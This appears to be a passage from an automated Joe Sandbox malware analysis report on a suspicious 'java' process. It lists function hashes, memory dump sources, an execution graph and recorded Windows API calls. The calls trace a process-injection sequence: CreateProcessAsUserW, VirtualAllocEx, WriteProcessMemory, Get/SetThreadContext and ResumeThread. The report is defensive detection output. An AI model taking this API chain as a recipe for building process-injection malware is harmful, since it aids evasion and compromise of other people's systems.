                                                            • Opcode Fuzzy Hash: 6f92e032293e356c83dd0432ae87fc57ac13d786d628bad3bfd66b006c7749c7
                                                            • Instruction Fuzzy Hash: C7D0673AB101089F8F04DF98E8418DDB7BAFB9C625B148116F915E7260C6319961DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B168B7 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2a763b8e230f2cd587f347c895f4de713745d5a22519f8f086801eb514fa7ab
                                                            • Instruction ID: c6bf02917d953cc5563c839d96df4b34577dfda54988da02c801a13875dd3a90
                                                            • Opcode Fuzzy Hash: e2a763b8e230f2cd587f347c895f4de713745d5a22519f8f086801eb514fa7ab
                                                            • Instruction Fuzzy Hash: 83D0C2321192058ECA40FB70FC4178D379AE7C1608F544C2CE0488B064DF28B5168746
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BF5D Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 930583b0e9613cce9a97196689f4bb224b8ff84bb06259b0fbb502d9a6dd75d1
                                                            • Instruction ID: c70d32fbc4793fecb232726343e7e020460b41cdf8364157f043acac66e97cb5
                                                            • Opcode Fuzzy Hash: 930583b0e9613cce9a97196689f4bb224b8ff84bb06259b0fbb502d9a6dd75d1
                                                            • Instruction Fuzzy Hash: BCE09A3090115ACFCB94DFA9D844BDCBBB5AF45208F1098EA901DB6264DA705E86CF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1D981 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad94940039e7f3f105502d8bb483040b5c68a0f882d1e9a61a274eebad93b3f2
                                                            • Instruction ID: fb436e42a6bfea039cf15e24d7cbf7e8b5d17f5a6d6adc3a36374610a6dcaa45
                                                            • Opcode Fuzzy Hash: ad94940039e7f3f105502d8bb483040b5c68a0f882d1e9a61a274eebad93b3f2
                                                            • Instruction Fuzzy Hash: 24E0EC34512355CFC755CF64D24985CBBB2FF49711F6014D8E4069B265CB35DA81CF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B168C8 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7b8313f91f7305c43f8f58269a678775f0130a017daf1b9d837c68e9eb2cb6b
                                                            • Instruction ID: c6bf387eee9644ce14939ecb40a452a36e33744ba3acd34ae5dcf165d78c4dfa
                                                            • Opcode Fuzzy Hash: a7b8313f91f7305c43f8f58269a678775f0130a017daf1b9d837c68e9eb2cb6b
                                                            • Instruction Fuzzy Hash: B4C012311162098F8D50BBB1E446699335EDAC120C7908D28E00C4F0A9DF7479165699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 02B1F640 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ?;)8$D*J$D*J$o0}$o0}
                                                            • API String ID: 0-1927398861
                                                            • Opcode ID: b5b3046ae7eb2cc9ba7d81586c1cbae5cda23f2b90633957836da57601948300
                                                            • Instruction ID: b2eb75d28992fea516102ee5cab5b200f0ad3bec51830a54865b22b89ed8a37d
                                                            • Opcode Fuzzy Hash: b5b3046ae7eb2cc9ba7d81586c1cbae5cda23f2b90633957836da57601948300
                                                            • Instruction Fuzzy Hash: 3D81B074E11219CFCB44CFA9C5849AEFBF2FF88310F64959AE515AB224D334AA42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B16560 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: K(i$K(i$K(i$K(i
                                                            • API String ID: 0-694474555
                                                            • Opcode ID: f3aa418cddce8d4cb10c794179ab26e3f8255a00807fd8633afaef971df246d1
                                                            • Instruction ID: cfd76f6c579e0888e27107ba743fcfcf4f7acf733de9b480ffcb4bb73c25832f
                                                            • Opcode Fuzzy Hash: f3aa418cddce8d4cb10c794179ab26e3f8255a00807fd8633afaef971df246d1
                                                            • Instruction Fuzzy Hash: 48118E347042144FC754EB7AD490A2AFBEDEF8A64439444BCE60ADF3A2EF61EC058791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1A148 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #i$#i$#i$#i
                                                            • API String ID: 0-2425302400
                                                            • Opcode ID: f1caa95e5bc06d45d258f0760ec91adc983f95747be87e1742206ebd850f92e8
                                                            • Instruction ID: a24765d412eb8163e86143ace2c278ce3a6f9378d0876921a7247b6e37448cfd
                                                            • Opcode Fuzzy Hash: f1caa95e5bc06d45d258f0760ec91adc983f95747be87e1742206ebd850f92e8
                                                            • Instruction Fuzzy Hash: 56018F717510108F87249A2DC440A2AB7EAEFEBB6479581EAE406CB3A0DB70EC91C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02B1BC84 Relevance: 5.0, Strings: 4, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001E.00000002.574620192.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_30_2_2b10000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KMRi$KMRi$n\?t$nt|
                                                            • API String ID: 0-3264837384
                                                            • Opcode ID: 58cf36e987c93ae0c36f86201f46cadf053dd666de76345dc348334c42e542b9
                                                            • Instruction ID: 3d6f72eee79bc046f32a3fc7610c4de81e1dbfb25ae9b5db8e97266c6baea6bb
                                                            • Opcode Fuzzy Hash: 58cf36e987c93ae0c36f86201f46cadf053dd666de76345dc348334c42e542b9
                                                            • Instruction Fuzzy Hash: 35F03AB8E01209CBDB24CFB4D5C069EFBB2AB48248F60A46AD011BB305EA308A418F04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:9%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:155
                                                            Total number of Limit Nodes:14
                                                            execution_graph 24235 6931b11 24236 6931adb 24235->24236 24237 6931b14 24235->24237 24241 6933b08 24236->24241 24244 6933b01 24236->24244 24238 6931ae9 24242 6933b50 VirtualProtect 24241->24242 24243 6933b8a 24242->24243 24243->24238 24245 6933b50 VirtualProtect 24244->24245 24246 6933b8a 24245->24246 24246->24238 24364 69361f0 24365 6936204 24364->24365 24368 6936582 24365->24368 24375 69367e0 24368->24375 24380 693677e 24368->24380 24384 6936668 24368->24384 24388 6936659 24368->24388 24392 6936764 24368->24392 24369 693620d 24376 69367e6 24375->24376 24396 6936d18 24376->24396 24400 6936d28 24376->24400 24377 69367f8 24377->24369 24381 6936791 24380->24381 24382 69367a3 24380->24382 24408 6936a61 24381->24408 24385 69366ac 24384->24385 24386 69367a3 24385->24386 24387 6936a61 2 API calls 24385->24387 24386->24386 24387->24386 24389 6936668 24388->24389 24390 69367a3 24389->24390 24391 6936a61 2 API calls 24389->24391 24391->24390 24393 6936717 24392->24393 24394 69367a3 24393->24394 24395 6936a61 2 API calls 24393->24395 24395->24394 24397 6936d28 24396->24397 24404 6936d60 24397->24404 24398 6936d46 24398->24377 24401 6936d36 24400->24401 24403 6936d60 RtlEncodePointer 24401->24403 24402 6936d46 24402->24377 24403->24402 24405 6936da9 24404->24405 24406 6936dcf RtlEncodePointer 24405->24406 24407 6936df8 24405->24407 24406->24407 24407->24398 24409 6936a7e 24408->24409 24413 6936ab0 24409->24413 24417 6936ac0 24409->24417 24410 6936a8e 24410->24382 24414 6936afa 24413->24414 24415 6936b24 RtlEncodePointer 24414->24415 24416 6936b4d 24414->24416 24415->24416 24416->24410 24418 6936afa 24417->24418 24419 6936b4d 24418->24419 24420 6936b24 RtlEncodePointer 24418->24420 24419->24410 24420->24419 24308 68e9d48 24309 68e9d8d GetThreadContext 24308->24309 24311 68e9dd5 24309->24311 24247 68ea680 24248 68ea6c8 WriteProcessMemory 24247->24248 24250 68ea71f 24248->24250 24251 68eab00 24252 68eab45 SetThreadContext 24251->24252 24254 68eab8d 24252->24254 24312 68ead40 24313 68ead80 ResumeThread 24312->24313 24315 68eadb1 24313->24315 24421 68e69e0 24423 68e6a07 24421->24423 24422 68e6b82 24423->24422 24426 68e8236 24423->24426 24430 68e8240 24423->24430 24427 68e8240 CreateProcessAsUserW 24426->24427 24429 68e83c0 24427->24429 24431 68e82bf CreateProcessAsUserW 24430->24431 24433 68e83c0 24431->24433 24255 693169c 24257 6933b01 VirtualProtect 24255->24257 24258 6933b08 VirtualProtect 24255->24258 24256 69316af 24257->24256 24258->24256 24316 563e0b0 GetCurrentProcess 24317 563e123 24316->24317 24318 563e12a GetCurrentThread 24316->24318 24317->24318 24319 563e160 24318->24319 24320 563e167 GetCurrentProcess 24318->24320 24319->24320 24321 563e19d GetCurrentThreadId 24320->24321 24323 563e1f6 24321->24323 24259 68eb518 24260 68eb6a3 24259->24260 24262 68eb53e 24259->24262 24262->24260 24263 68e6808 24262->24263 24264 68eb798 PostMessageW 24263->24264 24265 68eb804 24264->24265 24265->24262 24329 6931ecb 24330 6931ece 24329->24330 24332 6933b01 VirtualProtect 24330->24332 24333 6933b08 VirtualProtect 24330->24333 24331 6931f01 24332->24331 24333->24331 24270 6931a29 24271 69319f3 24270->24271 24272 6931a2c 24270->24272 24271->24270 24273 6933b01 VirtualProtect 24271->24273 24274 6933b08 VirtualProtect 24271->24274 24273->24271 24274->24271 24275 563e2d8 DuplicateHandle 24276 563e36e 24275->24276 24277 563bcd8 24278 563bce7 24277->24278 24281 563bdd0 24277->24281 24289 563bdbf 24277->24289 24297 563a5bc 24281->24297 24284 563bdfb 24284->24278 24285 563bdf3 24285->24284 24286 563bff8 GetModuleHandleW 24285->24286 24287 563c025 24286->24287 24287->24278 24290 563bde3 24289->24290 24291 563a5bc GetModuleHandleW 24289->24291 24292 563bdfb 24290->24292 24296 563c048 GetModuleHandleW 24290->24296 24291->24290 24292->24278 24293 563bdf3 24293->24292 24294 563bff8 GetModuleHandleW 24293->24294 24295 563c025 24294->24295 24295->24278 24296->24293 24298 563bfb0 GetModuleHandleW 24297->24298 24300 563bde3 24298->24300 24300->24284 24301 563c048 24300->24301 24302 563a5bc GetModuleHandleW 24301->24302 24303 563c06c 24302->24303 24303->24285 24434 563c218 24435 563c260 LoadLibraryExW 24434->24435 24436 563c25a 24434->24436 24437 563c291 24435->24437 24436->24435 24304 68ea3b0 24305 68ea3f0 VirtualAllocEx 24304->24305 24307 68ea42d 24305->24307 24334 68ebad0 24335 68ebaee 24334->24335 24336 68ebb30 24335->24336 24339 6937140 24335->24339 24343 693712f 24335->24343 24340 6937180 24339->24340 24341 693714d 24339->24341 24340->24335 24341->24340 24347 68ebe61 24341->24347 24344 6937180 24343->24344 24345 693714d 24343->24345 24344->24335 24345->24344 24346 68ebe61 7 API calls 24345->24346 24346->24344 24348 68ebeea 24347->24348 24349 68ebe88 24347->24349 24350 68ebf41 RtlDecodePointer 24348->24350 24353 68ec132 24348->24353 24349->24340 24351 68ebf6f 24350->24351 24352 68ebf76 RtlDecodePointer 24350->24352 24351->24352 24355 68ebfae 24352->24355 24353->24340 24354 68ebfe9 RtlEncodePointer 24354->24355 24355->24353 24355->24354 24356 68ec027 RtlDecodePointer 24355->24356 24357 68ec058 RtlEncodePointer 24355->24357 24358 68ec09d RtlDecodePointer 24355->24358 24359 68ec0d2 RtlDecodePointer 24355->24359 24356->24355 24356->24357 24357->24355 24358->24355 24358->24359 24359->24355

                                                            Executed Functions

                                                            Function 068E8240 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 270 68e8240-68e82cb 272 68e82cd-68e82d3 270->272 273 68e82d6-68e82dd 270->273 272->273 274 68e82df-68e82e5 273->274 275 68e82e8-68e8300 273->275 274->275 276 68e8302-68e830e 275->276 277 68e8311-68e83be CreateProcessAsUserW 275->277 276->277 279 68e83c7-68e8446 277->279 280 68e83c0-68e83c6 277->280 287 68e8458-68e845f 279->287 288 68e8448-68e844e 279->288 280->279 289 68e8476 287->289 290 68e8461-68e8470 287->290 288->287 292 68e8477 289->292 290->289 292->292
                                                            APIs
                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 068E83AB
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: 23d58f00c2c1ba57aa9b86f4476b6f2640570758e927521b5e90cc84d4675941
                                                            • Instruction ID: 413a08a2494493dab0a13f02541c23eef1bfd8ad81e1ce4ca36256c12faaf6db
                                                            • Opcode Fuzzy Hash: 23d58f00c2c1ba57aa9b86f4476b6f2640570758e927521b5e90cc84d4675941
                                                            • Instruction Fuzzy Hash: 225107B1D002299FDB60CF95C840BDDBBB5FF48304F0484AAE919B7250DB759A85DF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EBE61 Relevance: 10.7, APIs: 7, Instructions: 164COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • RtlDecodePointer.NTDLL ref: 068EBF5C
                                                            • RtlDecodePointer.NTDLL ref: 068EBF9B
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EC002
                                                            • RtlDecodePointer.NTDLL(00000000), ref: 068EC03E
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EC078
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: Pointer$Decode$Encode
                                                            • String ID:
                                                            • API String ID: 1638560559-0
                                                            • Opcode ID: 3682b4fb3266923ddc4b842ce539a9bdda2febbe028f504e92cb1de59a43319d
                                                            • Instruction ID: ff4ecd3eb3054c64aeafee572d933b7ef146d33144d77a557b157b46b22948e1
                                                            • Opcode Fuzzy Hash: 3682b4fb3266923ddc4b842ce539a9bdda2febbe028f504e92cb1de59a43319d
                                                            • Instruction Fuzzy Hash: 05718CB0C04385CFDF618FA9D54839EBFF0BF1A308F14845AD566A6691C3B94189CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563E0B0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0563E110
                                                            • GetCurrentThread.KERNEL32 ref: 0563E14D
                                                            • GetCurrentProcess.KERNEL32 ref: 0563E18A
                                                            • GetCurrentThreadId.KERNEL32 ref: 0563E1E3
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 0aaab9d80d93c74d45b5e0238b5f81f7e00b9953c8ca5475d3ef6504c7801ebb
                                                            • Instruction ID: 2729bc7460e702332de4d6c1d4d14a3bb6897f83be88b45b5d7ecda40c392310
                                                            • Opcode Fuzzy Hash: 0aaab9d80d93c74d45b5e0238b5f81f7e00b9953c8ca5475d3ef6504c7801ebb
                                                            • Instruction Fuzzy Hash: EB5144B0D006498FDB54CFA9D9887DEBBF5BB88304F208569E409A7350DB396844CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563BDD0 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 192 563bdd0-563bde5 call 563a5bc 195 563bde7-563bdf5 call 563c048 192->195 196 563bdfb-563bdff 192->196 195->196 200 563bf30-563bff0 195->200 197 563be13-563be54 196->197 198 563be01-563be0b 196->198 203 563be61-563be6f 197->203 204 563be56-563be5e 197->204 198->197 240 563bff2-563bff5 200->240 241 563bff8-563c023 GetModuleHandleW 200->241 206 563be93-563be95 203->206 207 563be71-563be76 203->207 204->203 208 563be98-563be9f 206->208 209 563be81 207->209 210 563be78-563be7f call 563b120 207->210 212 563bea1-563bea9 208->212 213 563beac-563beb3 208->213 211 563be83-563be91 209->211 210->211 211->208 212->213 216 563bec0-563bec9 call 563b130 213->216 217 563beb5-563bebd 213->217 222 563bed6-563bedb 216->222 223 563becb-563bed3 216->223 217->216 225 563bef9-563bf06 222->225 226 563bedd-563bee4 222->226 223->222 232 563bf29-563bf2f 225->232 233 563bf08-563bf26 225->233 226->225 228 563bee6-563bef6 call 563b140 call 563b150 226->228 228->225 233->232 240->241 242 563c025-563c02b 241->242 243 563c02c-563c040 241->243 242->243
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4cb719d9e6e790c3e7daa468d2cd97c6611b69eafc16d464245e5ebd86642885
                                                            • Instruction ID: 46689dfa8b459082e5b7158a4978858b4457064cb3249df315562201a267b9b0
                                                            • Opcode Fuzzy Hash: 4cb719d9e6e790c3e7daa468d2cd97c6611b69eafc16d464245e5ebd86642885
                                                            • Instruction Fuzzy Hash: D0713370A00B058FDB24DF6AD4457AAB7F6BF88344F00892DD48ADBB50D734E80ACB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068E8236 Relevance: 1.7, APIs: 1, Instructions: 170processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 246 68e8236-68e82cb 249 68e82cd-68e82d3 246->249 250 68e82d6-68e82dd 246->250 249->250 251 68e82df-68e82e5 250->251 252 68e82e8-68e8300 250->252 251->252 253 68e8302-68e830e 252->253 254 68e8311-68e83be CreateProcessAsUserW 252->254 253->254 256 68e83c7-68e8446 254->256 257 68e83c0-68e83c6 254->257 264 68e8458-68e845f 256->264 265 68e8448-68e844e 256->265 257->256 266 68e8476 264->266 267 68e8461-68e8470 264->267 265->264 269 68e8477 266->269 267->266 269->269
                                                            APIs
                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 068E83AB
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessUser
                                                            • String ID:
                                                            • API String ID: 2217836671-0
                                                            • Opcode ID: f6e713d1416c5e40a1f908bc5f989f71edc742eca8c3bf023cb993f0302ca123
                                                            • Instruction ID: 9540e54bccda7c4e5b71bc60e3aa8c4785f0931914fec607ea47e9533387119f
                                                            • Opcode Fuzzy Hash: f6e713d1416c5e40a1f908bc5f989f71edc742eca8c3bf023cb993f0302ca123
                                                            • Instruction Fuzzy Hash: 2C5127B1D002299FDB61CF99C840BDEBBB5FF48304F0484AAE949B7250DB759A85CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EA678 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 293 68ea678-68ea6ce 295 68ea6de-68ea71d WriteProcessMemory 293->295 296 68ea6d0-68ea6dc 293->296 298 68ea71f-68ea725 295->298 299 68ea726-68ea756 295->299 296->295 298->299
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068EA710
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: f3222ae04bb50a048026ca3b07aa14cd3d15bbad27e52ccad2222565eaea712b
                                                            • Instruction ID: c8ea68e2a5883701496d9f7d8e8f77c2eeebd8eb9d60a2ac4a9d41ba1454641a
                                                            • Opcode Fuzzy Hash: f3222ae04bb50a048026ca3b07aa14cd3d15bbad27e52ccad2222565eaea712b
                                                            • Instruction Fuzzy Hash: DE2133B59002099FCB10DFA9C884BEEBBF5FF48314F10882AE959A7240C7789944DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EA680 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 303 68ea680-68ea6ce 305 68ea6de-68ea71d WriteProcessMemory 303->305 306 68ea6d0-68ea6dc 303->306 308 68ea71f-68ea725 305->308 309 68ea726-68ea756 305->309 306->305 308->309
                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068EA710
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 07d88a6c131bcddcf464dbaf9a48302220ba2ba2b8afe1f0d339391374ac4227
                                                            • Instruction ID: bfb283eb016cf62c72cb5e83d5e70f400dc151fbb389c606cd04a4f5053df88e
                                                            • Opcode Fuzzy Hash: 07d88a6c131bcddcf464dbaf9a48302220ba2ba2b8afe1f0d339391374ac4227
                                                            • Instruction Fuzzy Hash: 5D2127B59003099FCF10DFA9C8847DEBBF5FF48354F10842AE959A7240C7789944DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EAAF9 Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 313 68eaaf9-68eab4b 315 68eab4d-68eab59 313->315 316 68eab5b-68eab8b SetThreadContext 313->316 315->316 318 68eab8d-68eab93 316->318 319 68eab94-68eabc4 316->319 318->319
                                                            APIs
                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 068EAB7E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: b2bedf02aced22b8ead19017063d385eb6b9da2e9024249aec5bc21af6778307
                                                            • Instruction ID: 8ec56eca5c23586d6bcfcfcbe525e311f836f08532bc6b2bb98513c4ace84363
                                                            • Opcode Fuzzy Hash: b2bedf02aced22b8ead19017063d385eb6b9da2e9024249aec5bc21af6778307
                                                            • Instruction Fuzzy Hash: B22159B1D003099FCB10DFA9C4847EEBBF5AF88324F148429D459A7240C7789985CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068E9D40 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 323 68e9d40-68e9d93 325 68e9d95-68e9da1 323->325 326 68e9da3-68e9da6 323->326 325->326 327 68e9dad-68e9dd3 GetThreadContext 326->327 328 68e9ddc-68e9e0c 327->328 329 68e9dd5-68e9ddb 327->329 329->328
                                                            APIs
                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 068E9DC6
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: e40d1a6692acc67b34a644e555ecbe6d5bad8f1a7135bb1bd8877106be34fa15
                                                            • Instruction ID: afc1747e2239d17ae84458e58d51ef8b0c5cffaee1bf839c8bceceb2424847ff
                                                            • Opcode Fuzzy Hash: e40d1a6692acc67b34a644e555ecbe6d5bad8f1a7135bb1bd8877106be34fa15
                                                            • Instruction Fuzzy Hash: 1E2168B5E002098FDB50DFA9C4847EEBBF5EF48364F54842ED559A7241CB78A984CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068E9D48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 333 68e9d48-68e9d93 335 68e9d95-68e9da1 333->335 336 68e9da3-68e9dd3 GetThreadContext 333->336 335->336 338 68e9ddc-68e9e0c 336->338 339 68e9dd5-68e9ddb 336->339 339->338
                                                            APIs
                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 068E9DC6
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: aaf982ae1baa32c95f10120dd7200889e8e8c48b44e18df02e6d5ebf53f3ed94
                                                            • Instruction ID: 3d43f28bb6eaad3f4d6867d5e8d4b555f9f3b829937611631b539d9027af5777
                                                            • Opcode Fuzzy Hash: aaf982ae1baa32c95f10120dd7200889e8e8c48b44e18df02e6d5ebf53f3ed94
                                                            • Instruction Fuzzy Hash: 582149B5D003099FCB50DFAAC8847EEFBF9EF48264F148429D519A7241CB78A944CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

